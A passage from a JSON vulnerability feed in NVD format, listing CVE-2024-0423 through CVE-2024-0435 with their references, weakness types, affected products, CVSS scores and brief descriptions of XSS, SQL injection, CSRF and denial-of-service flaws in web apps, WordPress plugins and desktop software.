"https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing", "name" : "https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250442", "name" : "https://vuldb.com/?ctiid.250442", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250442", "name" : "https://vuldb.com/?ctiid.250442", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250442", "name" : "https://vuldb.com/?id.250442", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250442", "name" : "https://vuldb.com/?id.250442", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in CodeAstro Online Food Ordering System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file dishes.php. The manipulation of the argument res_id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250442 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codeastro:online_food_ordering_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-11T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0424", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing", "name" : "https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing", "name" : "https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250443", "name" : "https://vuldb.com/?ctiid.250443", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250443", "name" : "https://vuldb.com/?ctiid.250443", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250443", "name" : "https://vuldb.com/?id.250443", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250443", "name" : "https://vuldb.com/?id.250443", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in CodeAstro Simple Banking System 1.0. This affects an unknown part of the file createuser.php of the component Create a User Page. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250443." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codeastro:simple_banking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-11T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0425", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250444", "name" : "https://vuldb.com/?ctiid.250444", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250444", "name" : "https://vuldb.com/?ctiid.250444", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250444", "name" : "https://vuldb.com/?id.250444", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250444", "name" : "https://vuldb.com/?id.250444", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in ForU CMS up to 2020-06-23. This vulnerability affects unknown code of the file /admin/index.php?act=reset_admin_psw. The manipulation leads to weak password recovery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250444." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:foru_cms_project:foru_cms:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2020-06-23", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-11T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0426", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250445", "name" : "https://vuldb.com/?ctiid.250445", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250445", "name" : "https://vuldb.com/?ctiid.250445", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250445", "name" : "https://vuldb.com/?id.250445", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250445", "name" : "https://vuldb.com/?id.250445", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. This issue affects some unknown processing of the file admin/cms_template.php. The manipulation of the argument t_name/t_path leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250445 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:foru_cms_project:foru_cms:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2020-06-23", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0427", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/1806fef3-d774-46e0-aa48-7a101495f4eb/", "name" : "https://wpscan.com/vulnerability/1806fef3-d774-46e0-aa48-7a101495f4eb/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/1806fef3-d774-46e0-aa48-7a101495f4eb/", "name" : "https://wpscan.com/vulnerability/1806fef3-d774-46e0-aa48-7a101495f4eb/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.4.1 does not properly escape user-controlled input when it is reflected in some of its AJAX actions." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:reputeinfosystems:arforms:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.4.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-06-12T06:15Z", "lastModifiedDate" : "2025-05-28T20:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0428", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php", "name" : "https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php", "name" : "https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Index Now plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.3. This is due to missing or incorrect nonce validation on the 'reset_form' function. This makes it possible for unauthenticated attackers to delete arbitrary site options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kobzarev:index_now:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.6.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0429", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop", "name" : "https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop", "name" : "https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A denial service vulnerability has been found on  Hex Workshop affecting version 6.7, an attacker could send a command line file arguments and control the Structured Exception Handler (SEH) records resulting in a service shutdown." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bpsoft:hex_workshop:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.7.0", "versionEndIncluding" : "6.7.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-11T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0430", "ASSIGNER" : "help@fluidattacks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fluidattacks.com/advisories/davis/", "name" : "https://fluidattacks.com/advisories/davis/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://fluidattacks.com/advisories/davis/", "name" : "https://fluidattacks.com/advisories/davis/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.iobit.com/en/malware-fighter.php", "name" : "https://www.iobit.com/en/malware-fighter.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.iobit.com/en/malware-fighter.php", "name" : "https://www.iobit.com/en/malware-fighter.php", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:iobit:malware_fighter:11.0.0.1274:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-01-22T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0431", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117", "name" : "https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117", "name" : "https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_set_default_card' function. This makes it possible for unauthenticated attackers to set the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabrick:gestpay_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "20240307", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-02-25T22:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0432", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/wppdf/", "name" : "https://wordpress.org/plugins/wppdf/", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://wordpress.org/plugins/wppdf/", "name" : "https://wordpress.org/plugins/wppdf/", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_delete_card' function. This makes it possible for unauthenticated attackers to delete the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabrick:gestpay_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "20240307", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-02-10T14:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0433", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/wppdf/", "name" : "https://wordpress.org/plugins/wppdf/", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://wordpress.org/plugins/wppdf/", "name" : "https://wordpress.org/plugins/wppdf/", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_unset_default_card' function. This makes it possible for unauthenticated attackers to remove the default status of a card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabrick:gestpay_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "20240307", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-02-10T14:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0434", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/tour-booking-manager/trunk/admin/settings/tour/TTBM_Settings_place_you_see.php#L225", "name" : "https://plugins.trac.wordpress.org/browser/tour-booking-manager/trunk/admin/settings/tour/TTBM_Settings_place_you_see.php#L225", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/tour-booking-manager/trunk/admin/settings/tour/TTBM_Settings_place_you_see.php#L225", "name" : "https://plugins.trac.wordpress.org/browser/tour-booking-manager/trunk/admin/settings/tour/TTBM_Settings_place_you_see.php#L225", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WordPress Tour & Travel Booking Plugin for WooCommerce – WpTravelly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ttbm_new_place_save' function in all versions up to, and including, 1.7.1. This makes it possible for unauthenticated attackers to create and publish new place posts. This function is also vulnerable to CSRF." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-29T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0435", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834", "name" : "https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834", "name" : "https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : 